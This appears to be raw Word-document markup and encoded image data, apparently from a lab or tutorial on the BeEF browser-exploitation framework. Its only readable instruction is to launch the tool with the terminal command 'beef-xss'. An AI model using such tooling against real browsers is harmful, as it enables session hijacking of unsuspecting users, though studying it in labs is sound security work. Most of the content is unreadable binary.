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P05rAkQQAADgTAAAOAAAA&#10;AAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQDAhiyKJowBACaMAQAU&#10;AAAAAAAAAAAAAAAAAPoGAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQABgAIAAAAIQBXXOek&#10;3QAAAAUBAAAPAAAAAAAAAAAAAAAAAFKTAQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEA&#10;N53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAABclAEAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BL&#10;BQYAAAAABgAGAHwBAABNlQEAAAA=&#10;">
                <v:rect id="Rectangle 6272" o:spid="_x0000_s1368" style="position:absolute;width:3950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1i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ZzFc34QnINf/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANn4jWLHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2537C199" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Open beef from terminal using command</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6273" o:spid="_x0000_s1369" style="position:absolute;left:29708;width:56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j5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trQo+cYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="25A52F08" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6274" o:spid="_x0000_s1370" style="position:absolute;top:2026;width:422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CN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OV2wjcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="16A4C8C1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>beef</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6275" o:spid="_x0000_s1371" style="position:absolute;left:3169;top:2026;width:81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14:paraId="4EE7F1E3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6276" o:spid="_x0000_s1372" style="position:absolute;left:3779;top:2026;width:2903;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14:paraId="71F3CBCC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>xss</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6277" o:spid="_x0000_s1373" style="position:absolute;left:59448;top:36125;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14:paraId="5844A573" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6284" o:spid="_x0000_s1374" type="#_x0000_t75" style="position:absolute;left:383;top:3889;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AMxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC/sdwlvY25oqItI1Lf5hqxcP6np/NM+m2LyUJmr99kYQPA4z8xtmlve2EVfqfO1YwXCQgCAu&#10;na65UvB/+PuZgvABWWPjmBTcyUOefX7MMNXuxju67kMlIoR9igpMCG0qpS8NWfQD1xJH7+Q6iyHK&#10;rpK6w1uE20aOkmQiLdYcFwy2tDRUnvcXq2BZrld6V22aYry9F4U5mmJ+XCj1/dXPf0EE6sM7/Gpv&#10;tILJaDqG55v4BGT2AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALRE4AzEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId133" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6285" o:spid="_x0000_s1375" style="position:absolute;left:256;top:3762;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oHxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTemo2xlRCzBrG29GhVEG+P7DMJyb4N2a1J/323UOhxmJlvmLyYTCfuNLjGsoJFFIMg&#10;Lq1uuFJwPr09pSCcR9bYWSYF3+Sg2Mwecsy0HfmT7kdfiQBhl6GC2vs+k9KVNRl0ke2Jg3ezg0Ef&#10;5FBJPeAY4KaTSRyvpMGGw0KNPe1qKtvjl1GwH5OLvx7e23Rxs7p/rl55eTgp9TiftmsQnib/H/5r&#10;f2gFqyR9gd834QnIzQ8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA7cgqB8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4B781" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC0DE9A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112894D6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-181"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A6E69BB" wp14:editId="38DB0692">
                <wp:extent cx="5986882" cy="3752873"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="44328" name="Group 44328"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3752873"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3752873"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6351" name="Rectangle 6351"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236388"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0744DAC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352" name="Rectangle 6352"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3400980"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6944AB8F"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353" name="Rectangle 6353"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3603672"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="00A4A7C2"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360" name="Picture 6360"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId134"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6361" name="Shape 6361"/>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6E69BB" id="Group 44328" o:spid="_x0000_s1376" style="width:471.4pt;height:295.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59868,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XVCdKQQAAMANAAAOAAAAZHJzL2Uyb0RvYy54bWzkV21v2zYQ/j5g&#10;/0HQ98ayFNuyEKcYmjUoMKxBX34ATVGWMIokSPol+/W7O1Kya6dLlwFdgQWIfBKPx+eeO/KON68P&#10;vUx2wrpOq1U6vcrSRCiu605tVunnT29flWniPFM1k1qJVfooXPr69uefbvamErlutayFTcCIctXe&#10;rNLWe1NNJo63omfuShuhYLDRtmceXu1mUlu2B+u9nORZNp/sta2N1Vw4B1/vwmB6S/abRnD/vmmc&#10;8IlcpYDN09PSc43Pye0NqzaWmbbjEQZ7AYqedQoWHU3dMc+Sre0uTPUdt9rpxl9x3U9003RckA/g&#10;zTQ78+be6q0hXzbVfmNGmoDaM55ebJb/vru35qN5sMDE3myAC3pDXw6N7fEXUCYHouxxpEwcfMLh&#10;42xZzssyTxMOY8VilpeLIpDKW2D+Yh5vf31m5mRYePIFnL2BBHFHDty/4+Bjy4wgal0FHDzYpKtX&#10;6byYTdNEsR4y9QPkDlMbKRL6SvSQ7kiWqxzw9gRTs+X1dZlDuiEneTEvyjJwMrIGGkXgbLosr4s5&#10;Do+Os8pY5++F7hMUVqkFKJRdbPeb80F1UMHlpcKn0m87KcMofgH+BoQo+cP6QE5OF7Qcflvr+hFc&#10;b7X98z1s4kbq/SrVUUpxX8PqOJom8p0CynELDYIdhPUgWC/faNpoAc8vW6+bjgAfV4vAIJaYcN8n&#10;qJCfTwQ1R9YRAiTA80GN4bzOsmUZz40fJJyLwY//Szhh6zwRTjp3/mk451kxX1AisOoHCSedFcf9&#10;8t/